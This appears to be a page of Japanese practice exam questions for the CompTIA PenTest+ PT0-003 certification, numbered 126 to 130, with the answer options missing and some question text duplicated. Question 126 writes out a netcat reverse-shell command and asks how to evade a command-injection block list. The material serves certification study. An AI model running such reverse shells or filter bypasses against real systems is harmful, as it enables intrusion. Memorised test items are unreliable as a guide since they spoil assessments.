PT0-003 試験問題 126
侵入テスターは、コマンドインジェクションブロックリストを回避してリモートコード実行の脆弱性を悪用しようとしています。テスターは次のコマンドを使用します。
nc -e /bin/sh 10.10.10.16 4444
フィルタリングされたスペース文字をバイパスする可能性が高いのは次のどれですか?
nc -e /bin/sh 10.10.10.16 4444
フィルタリングされたスペース文字をバイパスする可能性が高いのは次のどれですか?
PT0-003 試験問題 127
侵入テスターは、認証を必要としないWebコンポーネントを発見しました。このWebコンポーネントはファイルのアップロードも許可しており、対象の公開Webサイトのいずれかでホストされています。侵入テスターは次に以下のアクションを実行する必要がありますか?
PT0-003 試験問題 128
ペネトレーションテスターがkube-hunterを使用して対象企業のKubernetesクラスターの評価を実施します。このツールで検出できる脆弱性の種類は次のうちどれですか?
PT0-003 試験問題 129
偵察フェーズでは、侵入テスターが DNS レコードから次の情報を収集しました。
A-----> www
A-----> ホスト
TXT --> vpn.comptia.org
SPF---> ip =2.2.2.2
スプーフィングドメイン技術を使用したフィッシング攻撃を回避するには、次のどの DNS レコードを設定する必要がありますか?
A-----> www
A-----> ホスト
TXT --> vpn.comptia.org
SPF---> ip =2.2.2.2
スプーフィングドメイン技術を使用したフィッシング攻撃を回避するには、次のどの DNS レコードを設定する必要がありますか?
PT0-003 試験問題 130
侵入テスターがWindowsマシンにアクセスし、ネイティブOSの認証情報を使用してユーザーをさらに列挙したいと考えています。テスターは次のうちどれを使用すべきでしょうか?